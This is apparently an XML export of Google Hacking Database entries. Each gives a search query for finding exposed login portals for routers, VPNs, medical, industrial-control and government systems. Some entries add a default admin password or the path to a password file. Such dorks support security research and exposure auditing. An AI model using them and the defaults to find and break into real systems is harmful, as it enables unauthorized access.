<shortDescription>filetype:r2w r2w</shortDescription>
<textualDescription>WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example.</textualDescription>
<query>filetype:r2w r2w</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Ar2w+r2w</querystring>
<edb></edb>
<date>2004-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>1390</id>
<link>https://www.exploit-db.com/ghdb/1390</link>
<category>Pages Containing Login Portals</category>
<shortDescription>FlashChat v4.5.7</shortDescription>
<textualDescription>This simple search brings up lots of online Flash Chat clients. Flash Chat's administration directory is always found by visiting /admin in the URL. Example: www.webaddress.com/flashChat/admin/The default Admin password is &quot;adminpass&quot; (Without the speech marks).</textualDescription>
<query>FlashChat v4.5.7</query>
<querystring>https://www.google.com/search?q=FlashChat+v4.5.7</querystring>
<edb></edb>
<date>2006-07-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4869</id>
<link>https://www.exploit-db.com/ghdb/4869</link>
<category>Pages Containing Login Portals</category>
<shortDescription>frmLogin</shortDescription>
<textualDescription>Find websites using frmLogin login portals.
~CrimsonTorso
</textualDescription>
<query>frmLogin</query>
<querystring>https://www.google.com/search?q=frmLogin</querystring>
<edb></edb>
<date>2018-06-22</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>7466</id>
<link>https://www.exploit-db.com/ghdb/7466</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Cloudphysician RADAR&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Cloudphysician RADAR&quot;
# Pages Containing Login Portals (EMR Systems)
# Date: 20/10/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>Fwd: intitle:&quot;Cloudphysician RADAR&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Cloudphysician RADAR&quot;</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>7401</id>
<link>https://www.exploit-db.com/ghdb/7401</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Login&quot; &quot;FLX Web Server&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;Login&quot; &quot;FLX Web Server&quot;
# Pages Containing Login Portals
# Date:07/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Login&quot; &quot;FLX Web Server&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Login&quot; &quot;FLX Web Server&quot;</querystring>
<edb></edb>
<date>2021-10-07</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7450</id>
<link>https://www.exploit-db.com/ghdb/7450</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com
# Pages Containing Login Portals
# Date:15/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;MedDream&quot; &quot;Softneta&quot; -.com</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7413</id>
<link>https://www.exploit-db.com/ghdb/7413</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Project Insight - Login&quot; &quot;Sign In to Continue&quot; &quot;Shift4 Payments&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;Project Insight - Login&quot; &quot;Sign In to Continue&quot; &quot;Shift4 Payments&quot;
# Pages Containing Login Portals
# Date:09/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Project Insight - Login&quot; &quot;Sign In to Continue&quot; &quot;Shift4 Payments&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Project Insight - Login&quot; &quot;Sign In to Continue&quot; &quot;Shift4 Payments&quot;</querystring>
<edb></edb>
<date>2021-10-13</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7798</id>
<link>https://www.exploit-db.com/ghdb/7798</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;
# Pages Containing Login Portals
# Date:14/11/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Schneider Electric Telecontrol - Industrial Web Control&quot; intext:&quot;Xflow &quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7462</id>
<link>https://www.exploit-db.com/ghdb/7462</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Support Portal&quot; intext:&quot;Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.&quot; &quot;Representatives&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Support Portal&quot; intext:&quot;Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.&quot; &quot;Representatives&quot;
# Pages Containing Login Portals
# Date: 19/10/2021
# Exploit Author: Mugdha Peter Bansode
</textualDescription>
<query>Fwd: intitle:&quot;Support Portal&quot; intext:&quot;Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.&quot; &quot;Representatives&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Support Portal&quot; intext:&quot;Bomgar Corporation. Redistribution Prohibited. All Rights Reserved.&quot; &quot;Representatives&quot;</querystring>
<edb></edb>
<date>2021-10-20</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7851</id>
<link>https://www.exploit-db.com/ghdb/7851</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;
# Pages Containing Login Portals
# Date:14/06/2022
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Web UI&quot; inurl:&quot;/cgi-bin/luci&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7409</id>
<link>https://www.exploit-db.com/ghdb/7409</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;
# Pages Containing Login Portals
# Date:08/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: intitle:&quot;Zimbra Web Client Sign In&quot; &quot;Synacor&quot;</querystring>
<edb></edb>
<date>2021-10-11</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7455</id>
<link>https://www.exploit-db.com/ghdb/7455</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;</shortDescription>
<textualDescription># Google Dork: Fwd: inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;
# Pages Containing Login Portals
# Date:16/10/2021
# Exploit Author: Mugdha Bansode</textualDescription>
<query>Fwd: inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;</query>
<querystring>https://www.google.com/search?q=Fwd: inurl:&quot;/sslvpn_logon.shtml&quot; intitle:&quot;User Authentication&quot; &quot;WatchGuard Technologies&quot;</querystring>
<edb></edb>
<date>2021-10-19</date>
<author>Mugdha Bansode</author>
</entry>
<entry>
<id>7964</id>
<link>https://www.exploit-db.com/ghdb/7964</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Fwd: site:*/opac/login</shortDescription>
<textualDescription># Google Dork: Fwd: site:*/opac/login
# Pages Containing Login Portals
# Date:06/07/2022
# Exploit Author: nafih zain</textualDescription>
<query>Fwd: site:*/opac/login</query>
<querystring>https://www.google.com/search?q=Fwd: site:*/opac/login</querystring>
<edb></edb>
<date>2022-07-06</date>
<author>nafih zain</author>
</entry>
<entry>
<id>6924</id>
<link>https://www.exploit-db.com/ghdb/6924</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Google Dork: inurl:&quot;/zm/index.php&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;/zm/index.php&quot;
# Description: Find ZoneMinder (video surveillance software) login portals.
# Date: 05/10/2021.
# Exploit Author: Sohaib E.B.
# Category: Pages Containing Login Portals.
</textualDescription>
<query>Google Dork: inurl:&quot;/zm/index.php&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: inurl:&quot;/zm/index.php&quot;</querystring>
<edb></edb>
<date>2021-05-13</date>
<author>Sohaib E.B.</author>
</entry>
<entry>
<id>7235</id>
<link>https://www.exploit-db.com/ghdb/7235</link>
<category>Pages Containing Login Portals</category>
<shortDescription>Google Dork: inurl:&quot;admin/login&quot; site:&quot;.gov.in&quot;</shortDescription>
<textualDescription># Google Dork: inurl:&quot;admin/login&quot; site:&quot;.gov.in&quot;
# Pages Containing Login Portals
# Date: 16/09/2021
# Exploit Author: Bhavin Amesara</textualDescription>
<query>Google Dork: inurl:&quot;admin/login&quot; site:&quot;.gov.in&quot;</query>
<querystring>https://www.google.com/search?q=Google Dork: inurl:&quot;admin/login&quot; site:&quot;.gov.in&quot;</querystring>
<edb></edb>
<date>2021-09-16</date>
<author>Bhavin Amesara</author>
</entry>
<entry>
<id>6279</id>
<link>https://www.exploit-db.com/ghdb/6279</link>
<category>Pages Containing Login Portals</category>
<shortDescription>index of &quot;jira&quot; inurl:login</shortDescription>
<textualDescription>Dork: index of &quot;jira&quot; inurl:login
Date: 2020-06-14
Regards,
Nikhil Kumar
</textualDescription>
<query>index of &quot;jira&quot; inurl:login</query>
<querystring>https://www.google.com/search?q=index of &quot;jira&quot; inurl:login</querystring>
<edb></edb>
<date>2020-06-15</date>
<author>Nikhil Kumar</author>
</entry>
<entry>
<id>7689</id>
<link>https://www.exploit-db.com/ghdb/7689</link>
<category>Pages Containing Login Portals</category>
<shortDescription>index of:&quot;customer/login&quot;</shortDescription>
<textualDescription># Google Dork: index of:&quot;customer/login&quot;
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>index of:&quot;customer/login&quot;</query>
<querystring>https://www.google.com/search?q=index of:&quot;customer/login&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>7691</id>
<link>https://www.exploit-db.com/ghdb/7691</link>
<category>Pages Containing Login Portals</category>
<shortDescription>index of:&quot;seller/login&quot;</shortDescription>
<textualDescription># Google Dork: index of:&quot;seller/login&quot;
# Pages Containing Login Portals
# Date: 08/11/2021
# Exploit Author: Onkar Deshmukh</textualDescription>
<query>index of:&quot;seller/login&quot;</query>
<querystring>https://www.google.com/search?q=index of:&quot;seller/login&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Onkar Deshmukh</author>
</entry>
<entry>
<id>8266</id>
<link>https://www.exploit-db.com/ghdb/8266</link>
<category>Pages Containing Login Portals</category>
<shortDescription>initial:inurl:uux.aspx</shortDescription>
<textualDescription># Google Dork: initial:inurl:uux.aspx
# Pages Containing Login Portals
# Date:19/10/2023
# Exploit Author: Abdullah Al Maksud
</textualDescription>
<query>initial:inurl:uux.aspx</query>
<querystring>https://www.google.com/search?q=initial:inurl:uux.aspx</querystring>
<edb></edb>
<date>2023-10-19</date>
<author>Abdullah Al Maksud</author>
</entry>
<entry>
<id>7508</id>
<link>https://www.exploit-db.com/ghdb/7508</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext: &quot;mailenable&quot; inurl:&quot;/lang/sys/login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intext: &quot;mailenable&quot; inurl:&quot;/lang/sys/login.aspx&quot;
# Files Containing Juicy Info
# Date:27/10/2021
# Exploit Author: Nisrin Ahmed</textualDescription>
<query>intext: &quot;mailenable&quot; inurl:&quot;/lang/sys/login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intext: &quot;mailenable&quot; inurl:&quot;/lang/sys/login.aspx&quot;</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>Nisrin Ahmed</author>
</entry>
<entry>
<id>788</id>
<link>https://www.exploit-db.com/ghdb/788</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;&quot;BiTBOARD v2.0&quot; BiTSHiFTERS Bulletin Board&quot;</shortDescription>
<textualDescription>The bitboard2 is a board that need no database to work. So it is useful for webmaster that have no access to a sql database. The password file can be retrieve from/admin/data_passwd.dat</textualDescription>
<query>intext:&quot;&quot;BiTBOARD v2.0&quot; BiTSHiFTERS Bulletin Board&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22%22BiTBOARD+v2.0%22+BiTSHiFTERS+Bulletin+Board%22</querystring>
<edb></edb>
<date>2004-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4231</id>
<link>https://www.exploit-db.com/ghdb/4231</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;2008&quot; intext:&quot;OpenERP SA&quot; intitle:&quot;Login&quot;</shortDescription>
<textualDescription>Description: OpenERP login page
Google search: intext:&quot;2008&quot; intext:&quot;OpenERP SA&quot; intitle:&quot;Login&quot;
Author: nebo_oben</textualDescription>
<query>intext:&quot;2008&quot; intext:&quot;OpenERP SA&quot; intitle:&quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;2008&quot; intext:&quot;OpenERP SA&quot; intitle:&quot;Login&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>4228</id>
<link>https://www.exploit-db.com/ghdb/4228</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;2016 SAP AG. All rights reserved.&quot; intitle:&quot;Logon&quot;</shortDescription>
<textualDescription>Description: SAP Web Application Server login page
Google search: intext:&quot;2016 SAP AG. All rights reserved.&quot; intitle:&quot;Logon&quot;
Author: nebo_oben</textualDescription>
<query>intext:&quot;2016 SAP AG. All rights reserved.&quot; intitle:&quot;Logon&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;2016 SAP AG. All rights reserved.&quot; intitle:&quot;Logon&quot;</querystring>
<edb></edb>
<date>2016-03-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>7177</id>
<link>https://www.exploit-db.com/ghdb/7177</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Admin Login&quot; inurl:&quot;/login.aspx&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Admin Login&quot; inurl:&quot;/login.aspx&quot;
# Pages Containing Login Portals
# Date: 06/09/2021
# Exploit Author: Ujas Dhami
</textualDescription>
<query>intext:&quot;Admin Login&quot; inurl:&quot;/login.aspx&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Admin Login&quot; inurl:&quot;/login.aspx&quot;</querystring>
<edb></edb>
<date>2021-09-10</date>
<author>Ujas Dhami</author>
</entry>
<entry>
<id>7136</id>
<link>https://www.exploit-db.com/ghdb/7136</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;</shortDescription>
<textualDescription>#Google Dork: intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;
# Date: 25/06/2021
# Exploit Author: Neha Singh
</textualDescription>
<query>intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;amcrest&quot; &quot;Invalid login credentials&quot;</querystring>
<edb></edb>
<date>2021-08-31</date>
<author>Neha Singh</author>
</entry>
<entry>
<id>5885</id>
<link>https://www.exploit-db.com/ghdb/5885</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Any time &amp; Any where&quot; intext:&quot;Username&quot; intext:&quot;Password&quot; intext:login intext:&quot;View: Mobile | PC&quot;</shortDescription>
<textualDescription>Category: Pages Containing Login Portals
Nicholas Doropoulos</textualDescription>
<query>intext:&quot;Any time &amp; Any where&quot; intext:&quot;Username&quot; intext:&quot;Password&quot; intext:login intext:&quot;View: Mobile | PC&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Any time &amp; Any where&quot; intext:&quot;Username&quot; intext:&quot;Password&quot; intext:login intext:&quot;View: Mobile | PC&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Nicholas Doropoulos</author>
</entry>
<entry>
<id>7176</id>
<link>https://www.exploit-db.com/ghdb/7176</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Atlassian Jira Project Management Software&quot; Jira login</shortDescription>
<textualDescription># Google Dork: intext:&quot;Atlassian Jira Project Management Software&quot; Jira login
# Pages Containing Login Portals
# Date: 04/09/2021
# Exploit Author: KnoxPro BugHunter </textualDescription>
<query>intext:&quot;Atlassian Jira Project Management Software&quot; Jira login</query>
<querystring>https://www.google.com/search?q=intext:&quot;Atlassian Jira Project Management Software&quot; Jira login</querystring>
<edb></edb>
<date>2021-09-09</date>
<author>KnoxPro BugHunter</author>
</entry>
<entry>
<id>4974</id>
<link>https://www.exploit-db.com/ghdb/4974</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;authentication&quot; intranet password login inurl:account ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw | xlsx | docx | mail)</shortDescription>
<textualDescription>A mix of login portals and passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intext:&quot;authentication&quot; intranet password login inurl:account ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw | xlsx | docx | mail)</query>
<querystring>https://www.google.com/search?q=intext:&quot;authentication&quot; intranet password login inurl:account ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw | xlsx | docx | mail)</querystring>
<edb></edb>
<date>2018-10-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7977</id>
<link>https://www.exploit-db.com/ghdb/7977</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;change your SurgeMAIL account settings&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;change your SurgeMAIL account settings&quot;
# Category: Pages Containing Login Portals
# Date: 20/07/2022
# Exploit Author: s Thakur
</textualDescription>
<query>intext:&quot;change your SurgeMAIL account settings&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;change your SurgeMAIL account settings&quot;</querystring>
<edb></edb>
<date>2022-07-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6916</id>
<link>https://www.exploit-db.com/ghdb/6916</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Cisco Webui - Login&quot; -www -cisco.com</shortDescription>
<textualDescription># Dork: intext:&quot;Cisco Webui - Login&quot; -www -cisco.com
Regards,
Shezad Master
</textualDescription>
<query>intext:&quot;Cisco Webui - Login&quot; -www -cisco.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Cisco Webui - Login&quot; -www -cisco.com</querystring>
<edb></edb>
<date>2021-05-03</date>
<author>Shezad Master</author>
</entry>
<entry>
<id>5663</id>
<link>https://www.exploit-db.com/ghdb/5663</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;civicplus&quot; &quot;Login&quot;</shortDescription>
<textualDescription>Login pages to government websites using CivicPlus
Zerconil</textualDescription>
<query>intext:&quot;civicplus&quot; &quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;civicplus&quot; &quot;Login&quot;</querystring>
<edb></edb>
<date>2019-12-09</date>
<author>Zerconil</author>
</entry>
<entry>
<id>7067</id>
<link>https://www.exploit-db.com/ghdb/7067</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;developed and maintained by Netgate&quot; intitle:login</shortDescription>
<textualDescription># Google Dork: intext:&quot;developed and maintained by Netgate&quot; intitle:login
# Category: Pages Containing Login Portals
# Date: 02/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intext:&quot;developed and maintained by Netgate&quot; intitle:login</query>
<querystring>https://www.google.com/search?q=intext:&quot;developed and maintained by Netgate&quot; intitle:login</querystring>
<edb></edb>
<date>2021-08-20</date>
<author>s Thakur</author>
</entry>
<entry>
<id>5056</id>
<link>https://www.exploit-db.com/ghdb/5056</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;EQ1PCI&quot;</shortDescription>
<textualDescription>Finds Login portals
~ Kaligulah
</textualDescription>
<query>intext:&quot;EQ1PCI&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;EQ1PCI&quot;</querystring>
<edb></edb>
<date>2018-12-14</date>
<author>Kaligulah</author>
</entry>
<entry>
<id>5257</id>
<link>https://www.exploit-db.com/ghdb/5257</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;evetsites&quot; &quot;Login&quot;</shortDescription>
<textualDescription>Login portals for all sites hosted by popular veterinary hosting platform eVetSites
Zerconil
</textualDescription>
<query>intext:&quot;evetsites&quot; &quot;Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;evetsites&quot; &quot;Login&quot;</querystring>
<edb></edb>
<date>2019-06-17</date>
<author>Zerconil</author>
</entry>
<entry>
<id>1259</id>
<link>https://www.exploit-db.com/ghdb/1259</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.&quot; -edu</shortDescription>
<textualDescription>The page to change admin passwords. Minor threat but the place to start an attack.</textualDescription>
<query>intext:&quot;Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed.&quot; -edu</query>
<querystring>https://www.google.com/search?q=intext:%22Fill+out+the+form+below+completely+to+change+your+password+and+user+name.+If+new+username+is+left+blank,+your+old+one+will+be+assumed.%22+-edu+-gov+-mil&amp;start=180&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6828</id>
<link>https://www.exploit-db.com/ghdb/6828</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;helpdesk software provided by deskpro&quot;</shortDescription>
<textualDescription>Dear Team,
The dork will display Pages Containing Login Portals.
intext:&quot;helpdesk software provided by deskpro&quot;
--
Thanks &amp; Regards,
Anon Tuttu Venus
</textualDescription>
<query>intext:&quot;helpdesk software provided by deskpro&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;helpdesk software provided by deskpro&quot;</querystring>
<edb></edb>
<date>2021-03-16</date>
<author>Anon Tuttu Venus</author>
</entry>
<entry>
<id>3869</id>
<link>https://www.exploit-db.com/ghdb/3869</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;I'm using a public or shared computer&quot; &amp; intext:&quot;Remote Web Workplace&quot;</shortDescription>
<textualDescription>#Summary: Windows Business Server 2003 Login portal
#Category: Pages containing login portals
#Author: g00gl3 5c0u7</textualDescription>
<query>intext:&quot;I'm using a public or shared computer&quot; &amp; intext:&quot;Remote Web Workplace&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;I'm using a public or shared computer&quot; &amp; intext:&quot;Remote Web Workplace&quot;</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>6289</id>
<link>https://www.exploit-db.com/ghdb/6289</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;index of /&quot; &quot;customer.php&quot; &quot;~Login&quot;</shortDescription>
<textualDescription>Dork: intext:&quot;index of /&quot; &quot;customer.php&quot; &quot;~Login&quot;
Description: will give information related to customer and login info.
Author: Priyanka Prasad
</textualDescription>
<query>intext:&quot;index of /&quot; &quot;customer.php&quot; &quot;~Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;index of /&quot; &quot;customer.php&quot; &quot;~Login&quot;</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Priyanka Prasad</author>
</entry>
<entry>
<id>7310</id>
<link>https://www.exploit-db.com/ghdb/7310</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Infinitium Copyrights Reserved&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Infinitium Copyrights Reserved&quot;
# Pages Containing Login Portals
# Date:30/08/2021
# Exploit Author: Mohammad Zulfiqar WARDI</textualDescription>
<query>intext:&quot;Infinitium Copyrights Reserved&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Infinitium Copyrights Reserved&quot;</querystring>
<edb></edb>
<date>2021-09-28</date>
<author>Mohammad Zulfiqar WARDI</author>
</entry>
<entry>
<id>7036</id>
<link>https://www.exploit-db.com/ghdb/7036</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Lancom&quot; intitle:&quot;Router - Login&quot; -.com</shortDescription>
<textualDescription># Google Dork: intext:&quot;Lancom&quot; intitle:&quot;Router - Login&quot; -.com
# Category: Pages Containing Login Portals
# Date: 03/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>intext:&quot;Lancom&quot; intitle:&quot;Router - Login&quot; -.com</query>
<querystring>https://www.google.com/search?q=intext:&quot;Lancom&quot; intitle:&quot;Router - Login&quot; -.com</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>s Thakur</author>
</entry>
<entry>
<id>6106</id>
<link>https://www.exploit-db.com/ghdb/6106</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Launch FortiClient&quot; and &quot;Please Login&quot;</shortDescription>
<textualDescription>This dork found FortiClient Login Portals.
Google Dork: intext:&quot;Launch FortiClient&quot; and &quot;Please Login&quot;
Author: Berat ISLER (root1x)
</textualDescription>
<query>intext:&quot;Launch FortiClient&quot; and &quot;Please Login&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Launch FortiClient&quot; and &quot;Please Login&quot;</querystring>
<edb></edb>
<date>2020-05-20</date>
<author>berat isler</author>
</entry>
<entry>
<id>8005</id>
<link>https://www.exploit-db.com/ghdb/8005</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;login to authorize&quot; &quot;DynDNS&quot;</shortDescription>
<textualDescription># intext:&quot;login to authorize&quot; &quot;DynDNS&quot;
# Pages Containing Login Portals
# Date:25/07/2022
# Exploit Author: s Thakur</textualDescription>
<query>intext:&quot;login to authorize&quot; &quot;DynDNS&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;login to authorize&quot; &quot;DynDNS&quot;</querystring>
<edb></edb>
<date>2022-07-25</date>
<author>s Thakur</author>
</entry>
<entry>
<id>7094</id>
<link>https://www.exploit-db.com/ghdb/7094</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Login to Frappe&quot; +&quot;Forgot Password?&quot; +&quot;Reset Password&quot; inurl:login -intitle:&quot;My utm&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Login to Frappe&quot; +&quot;Forgot Password?&quot; +&quot;Reset Password&quot; inurl:login -intitle:&quot;My utm&quot;
# Pages Containing Login Portals
# Date: 29/07/2021
# Exploit Author: Marko Žlender
</textualDescription>
<query>intext:&quot;Login to Frappe&quot; +&quot;Forgot Password?&quot; +&quot;Reset Password&quot; inurl:login -intitle:&quot;My utm&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Login to Frappe&quot; +&quot;Forgot Password?&quot; +&quot;Reset Password&quot; inurl:login -intitle:&quot;My utm&quot;</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>Marko Žlender</author>
</entry>
<entry>
<id>5212</id>
<link>https://www.exploit-db.com/ghdb/5212</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Login | Password&quot; AND intext:&quot;Powered by | username&quot; AND intext:Drupal AND inurl:user</shortDescription>
<textualDescription>Dork:
intext:&quot;Login | Password&quot; AND intext:&quot;Powered by | username&quot; AND
intext:Drupal AND inurl:user
Description:
Drupal login portals
</textualDescription>
<query>intext:&quot;Login | Password&quot; AND intext:&quot;Powered by | username&quot; AND intext:Drupal AND inurl:user</query>
<querystring>https://www.google.com/search?q=intext:&quot;Login | Password&quot; AND intext:&quot;Powered by | username&quot; AND intext:Drupal AND inurl:user</querystring>
<edb></edb>
<date>2019-05-13</date>
<author>Isaiah Puzon</author>
</entry>
<entry>
<id>8238</id>
<link>https://www.exploit-db.com/ghdb/8238</link>
<category>Pages Containing Login Portals</category>
<shortDescription>intext:&quot;Login&quot; inurl:/secure</shortDescription>
<textualDescription># Google Dork: intext:&quot;Login&quot; inurl:/secure
# Pages Containing Login Portals
# Date: 11/09/2023
# Exploit Shubhranshu Gorai</textualDescription>
<query>intext:&quot;Login&quot; inurl:/secure</query>
